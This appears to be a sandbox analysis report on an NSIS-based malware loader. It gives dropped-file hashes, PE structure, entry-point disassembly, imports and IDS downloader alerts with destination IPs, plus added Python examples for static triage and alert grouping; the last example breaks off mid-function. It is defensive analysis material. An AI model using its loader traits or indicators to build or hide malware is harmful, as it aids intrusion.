Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55452 |
Entropy (8bit): | 5.30644161671957 |
Encrypted: | false |
SSDEEP: | 1536:L3ZsYDoSFyAkhotYr3XpNhdrWlR7uDZy4k:DiYMSFyVoANpy4k |
MD5: | 0D2CE39822E9236A380F4D1D53550E93 |
SHA1: | 8381B0E62708112DBFBED036650BF0667EC4476B |
SHA-256: | ED34DB2A55A35C90B524D2448353EB73D28DA7D7FF401477165C226FF25DE9AF |
SHA-512: | F365BB861DB3FC6D29736B3F8C0377BB4F8318FFF94BC96033AE208760082B529B8AEA4CF79DE9EFA3608C79AC91FE57E19F26959831F621BBA8816E1013AFC3 |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 891148 |
Entropy (8bit): | 7.7193229791674485 |
Encrypted: | false |
SSDEEP: | 24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd |
MD5: | A1E239C4D5116E289CE0597A92844EDE |
SHA1: | 4562D452CCC32512291C3165A0B9B3C076B28094 |
SHA-256: | 1E507FEBDD48A2BF2429C8011BD5CBC5C7B018207BDAEC87665B8B51FA13D904 |
SHA-512: | 500DDCDC2F1E3CA0DA0A43006B99C6E78697433FC0757D25DDFF94190DD2D725799FAF267EFDFACDEF758E9024591368454F14025662CC6A1309BCE7863494D2 |
Malicious: | true |
Antivirus: | |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\Rundholterne89.exe:Zone.Identifier
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 26 |
Entropy (8bit): | 3.95006375643621 |
Encrypted: | false |
SSDEEP: | 3:ggPYV:rPYV |
MD5: | 187F488E27DB4AF347237FE461A079AD |
SHA1: | 6693BA299EC1881249D59262276A0D2CB21F8E64 |
SHA-256: | 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 |
SHA-512: | 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\aktivitetsrunde.txt
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 362 |
Entropy (8bit): | 4.295609901239941 |
Encrypted: | false |
SSDEEP: | 6:OV0mI/AA3CU6sDq6ry0bxmAOvFz0/TWEMsesxM7JXZO:OVcAV6yw3Ovx0/q3shK7Js |
MD5: | A47DE65B255D62E154E75208730B37D2 |
SHA1: | 9AD95C489EABDBCD12C02CD312C85D0C73A565F7 |
SHA-256: | 1527C27BE377FB2EFDB75E64EF88FEE6B879712DEC1AE6E8CCA4E66188099784 |
SHA-512: | 206FB780CA6A6BEA7B1DA2AAD8D1E8C38331AE5A03CC82FC181A6E13234DC4523033AA775A3F15C261FEC74910ECAF622ABAC99444E8DAA8B63EC35379FBE29A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\discourteously.gam
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 339224 |
Entropy (8bit): | 3.2329059465811363 |
Encrypted: | false |
SSDEEP: | 3072:TlwUufGWwltoSeWq5Xck5tiy5ScV95Cca+8aB5p0jsDytfuWoaP/ZTf:x3W045X/5tiyB8faB5p4sD22uN |
MD5: | 2AFAF6367CF5833A8885999FEFA5B44A |
SHA1: | 58EDFAC56FD3BDA98CAD7F2A784F58CF0CCCA5A9 |
SHA-256: | 66D0440913A064549BF52DD102475A422A55A0A1A99A38C0445CCF84EB98C074 |
SHA-512: | A769F552CD91CE7163FE25C6E785D3A225979A9E50805F031C05E52CF5F82FB1E582FE621C947C7B0709F9E627C6CF318CF899CA97CC2BC4A3D934B94C2279A4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\psychograph.rut
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 91155 |
Entropy (8bit): | 3.2484639775571122 |
Encrypted: | false |
SSDEEP: | 768:sx0eYUpSjZTH4Refp/ZwLfKCGhiKveAC4LjJNV8RHwnx/F0H0jbPYER9RLXLxFJi:8UhyD9meQZFRRbLXdDRseVQq4 |
MD5: | 55DD84338306B8F361571D07E3D03F25 |
SHA1: | 5F086147B0ED6D4CBE40B6F81C1003EB07714B94 |
SHA-256: | 016DE5BD5CEBA70CD0041265F69BE3BB6FF54D3DCA19340ED44DC15317066E45 |
SHA-512: | 045E39931094C1D423D69C4BEF750CACF56E0DEF562162211F51F1B5E0C3E265ACEDE7FC06979CFCE68762A99180317419685E5542D3E44882B11116D1EE7FE8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\strudsfjerenes.uns
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411197 |
Entropy (8bit): | 3.2412073600303604 |
Encrypted: | false |
SSDEEP: | 6144:QuopzWTN5dkmo9X81LoYHLr0FJfFYcRQOD:KkxkfDEC |
MD5: | 9548F6F7A71852794789DE0AC5FDE451 |
SHA1: | 74C915E2C9C110929FD87C907BE17930B0B66B24 |
SHA-256: | 2D3371072047972236B2BAD7280E34BA1FD041C99CD132BC0E1DD767D0AFC471 |
SHA-512: | 0468FCA29C3F916CBC0B3B132EA24BB582ED0F0D4921523F5DF6EE17F76709437D25324E08AF3C43FCAE8BD1B9F388E49B64ED3C8464062E7D099B0D6B9BC5DE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Lrerkrfter\unnamed.jpg
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15845 |
Entropy (8bit): | 7.693658939604953 |
Encrypted: | false |
SSDEEP: | 384:dnSPb8riksvdEh0qrjVqIPrLgrpNQMUBWud20p:dnUwriksvMjrZqo3Up9U8ud20p |
MD5: | 762778DFE1B62D3430B44A32AEDC03E0 |
SHA1: | 7317D9579F9F4C4BEF82BE64FB3DFFB63160EEC5 |
SHA-256: | 9A602EBAFC1F46AAD7248F6DA82938CE382DE9FFBC6C472BD4848D4519CA67A8 |
SHA-512: | B39A8F6DC07F3A4CFE3CF5E1563543ECE2864FECED28282356FA64D7D0B50FA43B70F57FC8A2C4424A553E14E6BE526293D90F56C63994EC79F5520488EE0CCF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Sekundrlitteraturers.Non
Process: | C:\Users\user\Desktop\Rundholterne89.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 340868 |
Entropy (8bit): | 7.658610751329724 |
Encrypted: | false |
SSDEEP: | 6144:HP+VoRJRmCwM6PiJ5JsAPmxI26uHwKZUu36NbST5CFgX29:UoR/m9PiJ5Js5xhFwKZMNy0gG9 |
MD5: | D3086578D45D821207EAC6CBB8E24A2B |
SHA1: | 0772CBCE5403EDAE1AAB6310B2F58D7F99C726C0 |
SHA-256: | E856FC4F6B157E7799C1AF872064CD1BE9F982B1A5D18D7B16E5C3A48E3A1B1A |
SHA-512: | 7DB853BECC19B209C0534C8F09635C55DAB9BC540BD138054C2E84BBFC396BFA587BD4549A7188824F95271C04894BB7C66795F75267BCA16620BC27ED38807D |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.7193229791674485 |
TrID: | |
File name: | Rundholterne89.exe |
File size: | 891'148 bytes |
MD5: | a1e239c4d5116e289ce0597a92844ede |
SHA1: | 4562d452ccc32512291c3165a0b9b3c076b28094 |
SHA256: | 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904 |
SHA512: | 500ddcdc2f1e3ca0da0a43006b99c6e78697433fc0757d25ddff94190dd2d725799faf267efdfacdef758e9024591368454f14025662cc6a1309bce7863494d2 |
SSDEEP: | 24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd |
TLSH: | 8C152286F764DDB7E831527010BEA932E1716C728161920737A97F7A883373E0D4B6CA |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|..... |
Icon Hash: | 4ccc524656d64e01 |
Entrypoint: | 0x40310f |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | b78ecf47c0a3e24a6f4af114e2d1f5de |
Instruction |
---|
sub esp, 00000184h |
push ebx |
push esi |
push edi |
xor ebx, ebx |
push 00008001h |
mov dword ptr [esp+18h], ebx |
mov dword ptr [esp+10h], 00409198h |
mov dword ptr [esp+20h], ebx |
mov byte ptr [esp+14h], 00000020h |
call dword ptr [004070A8h] |
call dword ptr [004070A4h] |
cmp ax, 00000006h |
je 00007F880CDD9FD3h |
push ebx |
call 00007F880CDDCF41h |
cmp eax, ebx |
je 00007F880CDD9FC9h |
push 00000C00h |
call eax |
mov esi, 00407298h |
push esi |
call 00007F880CDDCEBDh |
push esi |
call dword ptr [004070A0h] |
lea esi, dword ptr [esi+eax+01h] |
cmp byte ptr [esi], bl |
jne 00007F880CDD9FADh |
push ebp |
push 00000009h |
call 00007F880CDDCF14h |
push 00000007h |
call 00007F880CDDCF0Dh |
mov dword ptr [0042E404h], eax |
call dword ptr [00407044h] |
push ebx |
call dword ptr [00407288h] |
mov dword ptr [0042E4B8h], eax |
push ebx |
lea eax, dword ptr [esp+38h] |
push 00000160h |
push eax |
push ebx |
push 00428828h |
call dword ptr [00407174h] |
push 00409188h |
push 0042DC00h |
call 00007F880CDDCB37h |
call dword ptr [0040709Ch] |
mov ebp, 00434000h |
push eax |
push ebp |
call 00007F880CDDCB25h |
push ebx |
call dword ptr [00407154h] |
Programming Language: | |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7534 | 0xa0 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x42000 | 0x1aa58 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x5fdd | 0x6000 | 38462d04cfdbc4943d18be461d53cc3e | False | 0.6783854166666666 | data | 6.499697507009752 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x1352 | 0x1400 | 3d134ae5961af9895950a7ee0adc520a | False | 0.4583984375 | data | 5.207538993430304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x254f8 | 0x600 | 2d00401e0c64d69b6d0ccb877d9f624e | False | 0.4544270833333333 | data | 4.0323505938358934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2f000 | 0x13000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x42000 | 0x1aa58 | 0x1ac00 | 098718c0c5bf54afe6e125c2f1ac35ba | False | 0.23448452102803738 | data | 3.706045365348602 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_BITMAP | 0x42460 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174 |
RT_ICON | 0x427c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.09021944871643203 |
RT_ICON | 0x52ff0 | 0x32f2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9443336911516639 |
RT_ICON | 0x562e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.16089211618257263 |
RT_ICON | 0x58890 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.18738273921200752 |
RT_ICON | 0x59938 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.31050106609808104 |
RT_ICON | 0x5a7e0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.440884476534296 |
RT_ICON | 0x5b088 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.5635838150289018 |
RT_ICON | 0x5b5f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.2703900709219858 |
RT_ICON | 0x5ba58 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.21908602150537634 |
RT_ICON | 0x5bd40 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.3716216216216216 |
RT_DIALOG | 0x5be68 | 0x144 | data | English | United States | 0.5216049382716049 |
RT_DIALOG | 0x5bfb0 | 0x13c | data | English | United States | 0.5506329113924051 |
RT_DIALOG | 0x5c0f0 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0x5c1f0 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0x5c310 | 0xc4 | data | English | United States | 0.5918367346938775 |
RT_DIALOG | 0x5c3d8 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0x5c438 | 0x92 | data | English | United States | 0.6575342465753424 |
RT_VERSION | 0x5c4d0 | 0x248 | data | English | United States | 0.5308219178082192 |
RT_MANIFEST | 0x5c718 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384 |
DLL | Import |
---|---|
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc |
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA |
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance |
Language of compilation system | Country where language is spoken |
---|---|
English | United States |
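A few of the static fields above carry more than they show at a glance: a `.ndata` section with zero raw size is the uninitialised-data section of the NSIS installer stub, so the 2016 link timestamp dates the stub, not the day this sample was built; `.data` maps 0x254f8 bytes from only 0x600 on disk; and the section raw sizes add up to far less than the 891,148-byte file, so most of the sample sits in an overlay after the last section, where an installer keeps its archive. The following added example, not code from the report or from Joe Sandbox, runs those checks over the values copied from the tables above. The entropy threshold, the "4x virtual over raw" ratio and the overlay estimate are this example's own choices, and the overlay figure is an upper bound because the header size is not printed on the page.

```python
"""Static triage of the PE metadata above: timestamp, entry point, sections, overlay.

Added example; not part of the original report. Constants are copied from the
report's tables; heuristics and thresholds are this example's own.
"""
import datetime

IMAGE_BASE = 0x400000
ENTRYPOINT = 0x40310f
TIMESTAMP = 0x57807BD9
FILE_SIZE = 891148

# (name, virtual address, virtual size, raw size, entropy) from the section table
SECTIONS = [
    (".text", 0x1000, 0x5fdd, 0x6000, 6.4997),
    (".rdata", 0x7000, 0x1352, 0x1400, 5.2075),
    (".data", 0x9000, 0x254f8, 0x600, 4.0324),
    (".ndata", 0x2f000, 0x13000, 0x0, 0.0),
    (".rsrc", 0x42000, 0x1aa58, 0x1ac00, 3.7060),
]


def decode_pe_timestamp(ts):
    """IMAGE_FILE_HEADER.TimeDateStamp is seconds since the Unix epoch, UTC."""
    return datetime.datetime.fromtimestamp(ts, datetime.timezone.utc)


def section_for_va(va, sections=SECTIONS, image_base=IMAGE_BASE):
    """Name of the section whose mapped range contains the virtual address."""
    rva = va - image_base
    for name, vaddr, vsize, raw_size, _ in sections:
        if vaddr <= rva < vaddr + max(vsize, raw_size):
            return name
    return None


def overlay_upper_bound(file_size=FILE_SIZE, sections=SECTIONS):
    """Bytes not covered by any section's raw data. The real overlay is this
    minus the PE headers, which the report does not size, so it is a bound."""
    return file_size - sum(raw for _, _, _, raw, _ in sections)


def triage(sections=SECTIONS, entrypoint=ENTRYPOINT, image_base=IMAGE_BASE,
           file_size=FILE_SIZE, high_entropy=7.0):
    """Ordered list of findings a reviewer would want from the static tables."""
    findings = []
    if any(name == ".ndata" for name, *_ in sections):
        findings.append("nsis-ndata-section")     # NSIS stub's BSS section name
    for name, _, vsize, raw, entropy in sections:
        if raw == 0 and vsize:
            findings.append(f"{name}:bss-only")   # nothing on disk, grows at load
        elif vsize > 4 * raw:
            findings.append(f"{name}:virtual>>raw")  # room reserved beyond file data
        if entropy >= high_entropy:
            findings.append(f"{name}:high-entropy")  # packed or encrypted section
    ep = section_for_va(entrypoint, sections, image_base)
    findings.append(f"entrypoint:{ep}" if ep else "entrypoint:outside-sections")
    if overlay_upper_bound(file_size, sections) > file_size // 2:
        findings.append("overlay-dominates-file")  # payload is appended, not in a section
    return findings


if __name__ == "__main__":
    print("built:", decode_pe_timestamp(TIMESTAMP).isoformat())
    print("overlay <=", overlay_upper_bound(), "bytes")
    for f in triage():
        print("-", f)
```

When the overlay dominates like this, hashing or scanning the sections alone tells you little about the sample; carve the overlay and inspect it separately, since that is where an installer-based loader keeps the files it later drops.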
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-22T16:04:14.198153+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.10 | 49709 | 142.250.185.174 | 443 | TCP |
2024-10-22T16:04:19.358399+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP |
2024-10-22T16:04:20.811576+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP |
2024-10-22T16:04:21.520222+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49713 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:22.249021+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49714 | 193.122.130.0 | 80 | TCP |
2024-10-22T16:04:22.954475+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49715 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:26.027860+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49719 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:28.905367+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49723 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:31.792925+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49727 | 188.114.97.3 | 443 | TCP |
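The nine alerts above fire on three destinations, and the useful signal is not the individual rule hit but the shape of the traffic: one TLS connection to 142.250.185.174, two plain-HTTP connections to 193.122.130.0, and five separate TLS connections to 188.114.97.3 on fresh source ports inside ten seconds, which is how a stager that re-fetches from one host looks on the wire. The following added example, not code from the report or from the ET ruleset, parses rows in the table's column order and summarises them per destination; the alert lines are a constructed copy of the table, and the three-flow threshold for a "repeated beacon" is this example's own choice.

```python
"""Group sandbox IDS alerts by destination and count distinct connections.

Added example; not part of the original report. ALERT_ROWS is a constructed copy
of the alert table above, in the same column order.
"""
from datetime import datetime

ALERT_ROWS = """\
2024-10-22T16:04:14.198153+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.10 | 49709 | 142.250.185.174 | 443 | TCP |
2024-10-22T16:04:19.358399+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP |
2024-10-22T16:04:20.811576+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | TCP |
2024-10-22T16:04:21.520222+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49713 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:22.249021+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.10 | 49714 | 193.122.130.0 | 80 | TCP |
2024-10-22T16:04:22.954475+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49715 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:26.027860+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49719 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:28.905367+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49723 | 188.114.97.3 | 443 | TCP |
2024-10-22T16:04:31.792925+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.10 | 49727 | 188.114.97.3 | 443 | TCP |
"""

COLUMNS = ("timestamp", "sid", "signature", "severity",
           "src_ip", "src_port", "dst_ip", "dst_port", "proto")


def parse_alerts(text):
    """One dict per well-formed row; header, separator and damaged rows are skipped."""
    alerts = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != len(COLUMNS):
            continue
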